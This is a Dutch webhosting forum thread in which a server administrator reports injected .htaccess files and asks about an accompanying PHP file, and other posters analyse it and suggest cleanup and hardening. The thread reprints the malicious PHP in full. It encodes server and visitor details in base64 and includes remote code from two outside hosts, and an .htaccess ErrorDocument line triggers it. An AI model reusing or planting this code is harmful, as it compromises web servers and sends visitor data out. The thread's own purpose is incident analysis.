Onderwerp: .htacces zooi op server, iemand die het kent ?

ik word vanavond onplezierig gewezen op het volgende, een klant heeft ineens allemaal .htacess bestanden in zijn mappen staan, en wel deze !

de inhoud van .htaccess = deze :
Options -MultiViews
ErrorDocument 404 //netplayplus/185792.php


En een PHP file die het volgende bevat:
<? error_reporting(O);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING
etc etc

Komt iemand dit bekend voor ??

Hans

Hans,

Een .htaccess-bestand is geen zooi, maar wordt gebruikt om Apache instructies te geven, bijvoorbeeld voor het maken van een beveiligde directory, het creeren van URL-vriendelijke url's als bijvoorbeeld; http://www.gelre.fm/nieuws/199 in plaats van: http://www.gelre.fm/index.php?p=nieu...t=items&id=199

Randy

dus als ik dit .htaccess bestand tegenkom in een paar honderd directory's op mijn server en er daarnaast ook nog eens extra 2134.php bestanden opstaan, is het een vriendelijk bestand ??

Wel dan is het jammer voor dit vriendelijke bestand wat schijnbaar inloggegevens wil hebben van users, maar het word nu toch gewipt door ons !

Dus eigenlijk snap ik je posting niet echt,of je weet niet wat het bestand uit kan gaan voeren ! hellaas is de .sh functie uitgeschakeld, want het werd nogal wat keren aangeroepen, ik ben dus hard aan het zoeken welk script die vriendelijke bestand heeft aangemaakt !

@Bullcat : dat stukje PHP is nog niet zo gevaarlijk (lees wat variablen uit die waarschijnlijk verderop geprint worden), maar misschien dat je niet alles geplakt hebt? Met alleen deze informatie is het voor ons lastig om te bepalen of het kwalijk is of niet.

Wat ik wel weet is dat wanneer dit opeens opduikt in meerdere accounts (en gisteren bv. nog niet op je server voorkwam) zonder dat de gebruikers die geupload hebben, je een tamelijk serieus probleem hebt, wat je niet alleen maar even oplost door de bestanden te verwijderen. Je zult niet alleen moeten nagaan hoe "ze" zijn binnengekomen en deze bestanden hebben kunnen plaatsen, maar ook wat ze nog meer hebben veranderd hebben. Meestal is de beste 'cure' bij een hack uithuilen, formateren en opnieuw installeren (en natuurlijk je beveiliging ernstig updaten)

Succes!

het gaat op deze source

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".". base64_encode($b).".".base64_encode($c).".".base64 _encode($d).".".base64_encode($e).".".base64_encod e($f).".".base64_encode($g).".".base64_encode($h). ".$s.".base64_encode($i).".".base64_encode($j) ; if ((include(base64_decode("aHR0cDovLw==").base64_dec ode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_deco de("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?>


Dus graag helpie helpie !

Waarschijnlijk haalt het stukje php alle variabelen die er zijn op(volgens mij zet hij ze in variabele $a., heb er alleen niet echt goed naar gekeken), het gecodeerde stukje zou dan iets kunnen zijn wat deze variabelen mailt..

ik neem aan dat de code hierin staat?:

//netplayplus/185792.php

Dan neem ik tevens aan dat de cracker de map netplayplus ook heeft aangemaakt.

Je beveiliging is dus wel heel erg brak, waarschijnlijk niet eens open_basedir/phpsafemode/apache beter configgen aan staan, waardoor php vanaf 1 plek bij alle gebruikers kan..

Bekijk de volgende thread eens:
http://www.webhostingtalk.nl/scripti...n-en-tips.html

Snaaps heeft trouwens een mooie how to gemaakt.. voor directadmin icm beveiliging.. Maar ik weet natuurlijk niet welk controle paneel jij gebruikt.

Wat ik zo opmaak uit het script is dat hij eeen aantal variablen van je server samenstelt en vervolgens met die gegevens een query uitvoert op 2 verschillende websites:
www3.phptags.ws
shop.vmarket.info

Zodra je waarschijnlijk al die dingen die hij in variablen stopt encoded en meegeeft zal het script daar wat mee gaan doen en het eea gaan laten draaien.

Enige remedie:
Rkhunter draaien en de rootkit(s) achterhalen, kijken in hoeverre je terug kunt vinden of het te fixen is... Maar eigenlijk is het beste idee gewoon een reinstall.

Ik zou in php.ini de short php tags uitzetten. Dan draait het script niet. En verder asap e.e.a. uit gaan pluizen.

Oorspronkelijk geplaatst door crazycoder

Ik zou in php.ini de short php tags uitzetten. Dan draait het script niet. En verder asap e.e.a. uit gaan pluizen.

Maar dan draaien ook de scripts van je klanten niet meer??

Ja maar dat kan ook aan de scripter liggen, normaal zetten die standaard <?php neer .

Maar ook ik ben er vandaag achter gekomen dat ik ineens allemaal klanten op de stoep kreeg met niet werkende pagina's ! dus maar weer even uit gezet, en een mailing de deur uit gedaan dat ze toch echt binnen niet al te lange tijde die php scripts even moeten doorlopen en ervoor dienen te zorgen dat er dus <php staat aan het begin !

Hans

Nu ga je je klanten vertellen om hun scripts aan te passen naar <?php ipv. <?

....

en als de scripter die de rotzooi heeft achtergelaten dat nu ook doet ..?

Even iets aan beveiliging doen is toch echt een betere optie.

Afgezien dat ik dit zeer kwalijk vind lijkt het mij idd. ook beter om een re-install te doen....

een re-install ?? lost dat het probleem op dan !

Die code doet weinig speciaals behalve wat file includes. ( heb geen decode gedaan maar dat kan je zelf makkelijk doen . www.php.net/decode/ dat is zo ingewikkeld niet.

short tags ipv... maakt ook niets uit. Gewoon kijken wat in de decode staat, en uitzoeken wie die files upload.

Filetime ect.. even uitzoeken waar het allmeaal begon ey.. kan effe kut zijn maar ach....

Oorspronkelijk geplaatst door thrunx

Maar dan draaien ook de scripts van je klanten niet meer??

Alleen als zij short tags gebruiken dus:
<?
ipv
<?php

Bij ons is de laatste de standaard omdat het altijd op alle servers werkt waar PHP op draait.

Oorspronkelijk geplaatst door ol4pro

short tags ipv... maakt ook niets uit. Gewoon kijken wat in de decode staat, en uitzoeken wie die files upload.

Zorgt ervoor dat het script niet meer draait